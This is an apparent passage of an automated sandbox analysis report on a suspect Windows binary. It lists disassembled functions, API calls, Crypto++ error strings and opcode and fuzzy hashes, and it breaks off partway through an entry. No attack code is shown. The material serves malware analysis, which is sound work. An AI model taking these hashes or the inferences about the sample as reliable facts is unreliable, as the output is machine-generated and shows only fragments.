                                      • Opcode Fuzzy Hash: 65f2474001a417308d885f7328b3e0bbf6e18573b6a727c22d2a558f8c1c88e2
                                      • Instruction Fuzzy Hash: 6811EC75800228ABCF00EFA4C856BEE77B4AF94320F240809F815A73E2CF309A40CB91
                                      Function 00938FE4 Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 00938FEB
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00938FF5
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • moneypunct.LIBCPMT ref: 0093902F
                                      • std::_Facet_Register.LIBCPMT ref: 00939046
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00939066
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00939084
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                                      • String ID:
                                      • API String ID: 113178234-0
                                      • Opcode ID: 399aa3a883ca402449c3087715a881a16702857799e8c548c6e43212b2fabbff
                                      • Instruction ID: 824bbc8a6fad58525d258d586c7260deedb82ad4e1f85bb733206a81f104c6e1
                                      • Opcode Fuzzy Hash: 399aa3a883ca402449c3087715a881a16702857799e8c548c6e43212b2fabbff
                                      • Instruction Fuzzy Hash: 3C11A0759042249BCF05EFA4D856BEE77B9AF84320F240409F401A72E2CF749A44CB91
                                      Function 0093908A Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 00939091
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0093909B
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • moneypunct.LIBCPMT ref: 009390D5
                                      • std::_Facet_Register.LIBCPMT ref: 009390EC
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0093910C
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0093912A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                                      • String ID:
                                      • API String ID: 113178234-0
                                      • Opcode ID: 9d773016f9c6058e002c82ac2c70db038f709033d876bef2fafdf8aa8cb54773
                                      • Instruction ID: 7a6d2a1ef1007799ab5b7b112af54927d8afb3dcf058016b84cd07cd7ac7fccd
                                      • Opcode Fuzzy Hash: 9d773016f9c6058e002c82ac2c70db038f709033d876bef2fafdf8aa8cb54773
                                      • Instruction Fuzzy Hash: BC11A075908229ABCF04EBA4D856BEE77B4AF84720F24040AF415B73D1DF749E40CB91
                                      Function 00974B79 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(000000FF,00000000,00961C08,00000000,00000000,?,009620EE,00000000,00000000,008EC60F,?,000000FF), ref: 00974B7D
                                      • _free.LIBCMT ref: 00974BB0
                                      • _free.LIBCMT ref: 00974BD8
                                      • SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BE5
                                      • SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BF1
                                      • _abort.LIBCMT ref: 00974BF7
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: f26688bbd56bf28ba251851046a55bf8cabe61356d220188689abe926357e065
                                      • Instruction ID: 20648f1a1d99425f255142e9bcf64e71332d45612e1038a82d0500272c41414e
                                      • Opcode Fuzzy Hash: f26688bbd56bf28ba251851046a55bf8cabe61356d220188689abe926357e065
                                      • Instruction Fuzzy Hash: 75F02237588A80B7C60237396C1AF2F236E9BC1F60B25C526F81CE2292EF24CD01A121
                                      Function 008F76D0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 274COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008F79FF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: exceeds the maximum of $: footer length $: header length $: message length
                                      • API String ID: 2005118841-976070898
                                      • Opcode ID: ce8dfe016ac6d9045ef30801f5608c27acb9eb052bc37b1a3c681fa00b6ca39e
                                      • Instruction ID: 8646635b829a0c573adddea75b661c0db23e1f6fd25aa002af6f7953dbea6d33
                                      • Opcode Fuzzy Hash: ce8dfe016ac6d9045ef30801f5608c27acb9eb052bc37b1a3c681fa00b6ca39e
                                      • Instruction Fuzzy Hash: AFA14B75A0028CEFDB21DFA8CC45FEEBBACFF59304F144459E949E7241DA749A048BA1
                                      Function 008FD140 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 161COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008FD208
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008FD2C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: AAD$AuthenticatedDecryptionFilter$AuthenticatedEncryptionFilter
                                      • API String ID: 2005118841-4071778396
                                      • Opcode ID: bfba120fbae27798cffb31eda38300e524193e8befac3b0d7dd4b9641a9d8682
                                      • Instruction ID: 704bee7dc709e9fee3bad81b206229339846d40200a8be21a2660f00c792e03a
                                      • Opcode Fuzzy Hash: bfba120fbae27798cffb31eda38300e524193e8befac3b0d7dd4b9641a9d8682
                                      • Instruction Fuzzy Hash: 94515E7190430DAFCB14DFA4DC41FAEBBB9FB58720F000529FA02A7691DB71A958DB91
                                      Function 008FCF60 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 134COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008FD004
                                        • Part of subcall function 00958621: RaiseException.KERNEL32(?,?,00925B8C,?,?,Dflt,?,?,?,?,?,00925B8C,?,009C9A70,?), ref: 00958681
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008FD0B7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw$ExceptionRaise
                                      • String ID: AAD$AuthenticatedDecryptionFilter$AuthenticatedEncryptionFilter
                                      • API String ID: 3476068407-4071778396
                                      • Opcode ID: aa13aa65e1c9702b2563d509c580278fe23a8ebdf35522a583cdef4f17b17270
                                      • Instruction ID: fa6a62df7c0acb7ddd80e762b74a01b90f429d219a239b2bcceb880f16d40352
                                      • Opcode Fuzzy Hash: aa13aa65e1c9702b2563d509c580278fe23a8ebdf35522a583cdef4f17b17270
                                      • Instruction Fuzzy Hash: B5418F71A0460CAFCB14DFA4C845FAEB7B8FB44724F504569F912A7781DB74BA08CB90
                                      Function 008B6620 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 129COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008B6690
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008B66EE
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 008B6742
                                      Strings
                                      • CryptoMaterial: this object contains invalid values, xrefs: 008B6667
                                      • CryptoMaterial: this object does not support precomputation, xrefs: 008B66C5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw$___std_exception_copy
                                      • String ID: CryptoMaterial: this object contains invalid values$CryptoMaterial: this object does not support precomputation
                                      • API String ID: 4178755008-3364311089
                                      • Opcode ID: 09b8e60cd3fac046248f39f5ce851ecfbbf59c89706e3066ed2aa77de8ce6c8a
                                      • Instruction ID: caa68137cc8665c77ffc2966acedc40739d999b94fcdc68e937eb7db62e52171
                                      • Opcode Fuzzy Hash: 09b8e60cd3fac046248f39f5ce851ecfbbf59c89706e3066ed2aa77de8ce6c8a
                                      • Instruction Fuzzy Hash: D2414F71904608ABCB11DF95C841F9EB7FCFB45714F10866AE811E3790EB75AA18CB90
                                      Function 008F4F60 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 124COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008F4FFD
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008F502B
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 008F5082
                                      Strings
                                      • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 008F4FD4
                                      • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 008F5002
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw$___std_exception_copy
                                      • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
                                      • API String ID: 4178755008-3345525433
                                      • Opcode ID: 62dd2b86fd258f8b5ac3ecb97a9dcc2f70feea3ffe2e4f58178830a6f629ec3e
                                      • Instruction ID: 2db636bdeb736a4b6b0485230909614352810418b9c31b785f076cc04cbecfd5
                                      • Opcode Fuzzy Hash: 62dd2b86fd258f8b5ac3ecb97a9dcc2f70feea3ffe2e4f58178830a6f629ec3e
                                      • Instruction Fuzzy Hash: 8F418071914608ABCB10EFA8C841BEEF7BCFF44714F00452AE911E3781EB74A608CB60
                                      Function 00913210 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 110COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 009114E0: ___std_type_info_name.LIBVCRUNTIME ref: 0091159E
                                        • Part of subcall function 009114E0: ___std_type_info_name.LIBVCRUNTIME ref: 00911609
                                      • ___std_type_info_name.LIBVCRUNTIME ref: 00913261
                                        • Part of subcall function 009583D9: ___unDName.LIBVCRUNTIME ref: 00958405
                                      • ___std_type_info_name.LIBVCRUNTIME ref: 009132C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ___std_type_info_name$Name___un
                                      • String ID: Modulus$PublicExponent$ThisObject:
                                      • API String ID: 3683324773-1616987064
                                      • Opcode ID: 3a8be776ae2b1dc814e488b997423bfa13627a2638d256e099a702a96d7eb7fc
                                      • Instruction ID: bce8f1a4e918de9c607d440d9a76f82c762c4ee6b220154bc223a83aad3673ef
                                      • Opcode Fuzzy Hash: 3a8be776ae2b1dc814e488b997423bfa13627a2638d256e099a702a96d7eb7fc
                                      • Instruction Fuzzy Hash: 73412C307083456EC711AF34CC52B9BBBF5AFD5318F048A19F49467292EB72DA89C742
                                      Function 0093A49D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Mpunct$GetcvtH_prolog3
                                      • String ID: $+xv
                                      • API String ID: 279835032-1686923651
                                      • Opcode ID: 545ff8dc2155cab6440d968ef0e188bac0e2246decfadeb973ca7500246dea23
                                      • Instruction ID: 2a63f1f28e4edcec09be54247f10636da24754d2937d63e38290171596ca98a2
                                      • Opcode Fuzzy Hash: 545ff8dc2155cab6440d968ef0e188bac0e2246decfadeb973ca7500246dea23
                                      • Instruction Fuzzy Hash: B621B0B1904B566ED725DF74849073BBEF8AB49300F044A1AF099C7A41E734EA01CF90
                                      Function 008B3740 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008B376D
                                        • Part of subcall function 00958621: RaiseException.KERNEL32(?,?,00925B8C,?,?,Dflt,?,?,?,?,?,00925B8C,?,009C9A70,?), ref: 00958681
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008B37B2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw$ExceptionRaise
                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                      • API String ID: 3476068407-1866435925
                                      • Opcode ID: 1eec4d3ebad971fd8ebbb4b927ceded89149ae206f0cd581b8112f198a671d9f
                                      • Instruction ID: 2ed866173d9e9eef4d9aa7ff50887748847fd0f7ba616ddf470b9595a62bd4c4
                                      • Opcode Fuzzy Hash: 1eec4d3ebad971fd8ebbb4b927ceded89149ae206f0cd581b8112f198a671d9f
                                      • Instruction Fuzzy Hash: 05F0F9F29057086BC720E95CC816BEB3388EB01350F084579FD65DA282EE35AA1587D6
                                      Function 0096170E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009616BF,?,?,0096165F,?,009CCA70,0000000C,009617B6,?,00000002), ref: 0096172E
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00961741
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,009616BF,?,?,0096165F,?,009CCA70,0000000C,009617B6,?,00000002,00000000), ref: 00961764
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: def14f2890f4693ac13972d9ea21cccf9dbe891eaf92c902778277a5f2c86370
                                      • Instruction ID: 80738affe584d455c5238a16fd5e5aace94f63d45e65a65dadb50948475772f5
                                      • Opcode Fuzzy Hash: def14f2890f4693ac13972d9ea21cccf9dbe891eaf92c902778277a5f2c86370
                                      • Instruction Fuzzy Hash: 9DF0C230A14218BBCB009FA8DC49FAEBFB8EF44712F044169F806A2160CF709E40DB90
                                      Function 0094EA21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0094EA35
                                      • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0094EA59
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0094EA6C
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0094EA7A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                      • String ID: pScheduler
                                      • API String ID: 3657713681-923244539
                                      • Opcode ID: d18b1f9a5b5c2eab5675940a2e800b0e3d7d1f160fed843fa7f567d6ba483216
                                      • Instruction ID: 48fdf1ec0ecaec178ce24e0a305f76851a65a65226f43a6135a0eacc1e9f74a8
                                      • Opcode Fuzzy Hash: d18b1f9a5b5c2eab5675940a2e800b0e3d7d1f160fed843fa7f567d6ba483216
                                      • Instruction Fuzzy Hash: 1BF0E935900204A7CB24FA54D852E9EB37DBFC0B147148569E50663285EB70AD06C751
                                      Function 0096B5E3 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 023ccc39e3ab9702eec2e1f91f534b62135b85e18f0d67b92d136bc39644d945
                                      • Instruction ID: d151c4fb2e6ff0047c1c8d0f86864cb257a1bd1779fbad0fe3ef6d94fb4f353a
                                      • Opcode Fuzzy Hash: 023ccc39e3ab9702eec2e1f91f534b62135b85e18f0d67b92d136bc39644d945
                                      • Instruction Fuzzy Hash: 307170359002169BDF219F99C884ABFBBBDFF85360F244229E915D7681E7709DC1CBA0
                                      Function 00971704 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00976393: RtlAllocateHeap.NTDLL(00000000,?,?,?,0095833C,?,?,?,?,?,008B1F07,?,?,?), ref: 009763C5
                                      • _free.LIBCMT ref: 0097180F
                                      • _free.LIBCMT ref: 00971826
                                      • _free.LIBCMT ref: 00971845
                                      • _free.LIBCMT ref: 00971860
                                      • _free.LIBCMT ref: 00971877
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
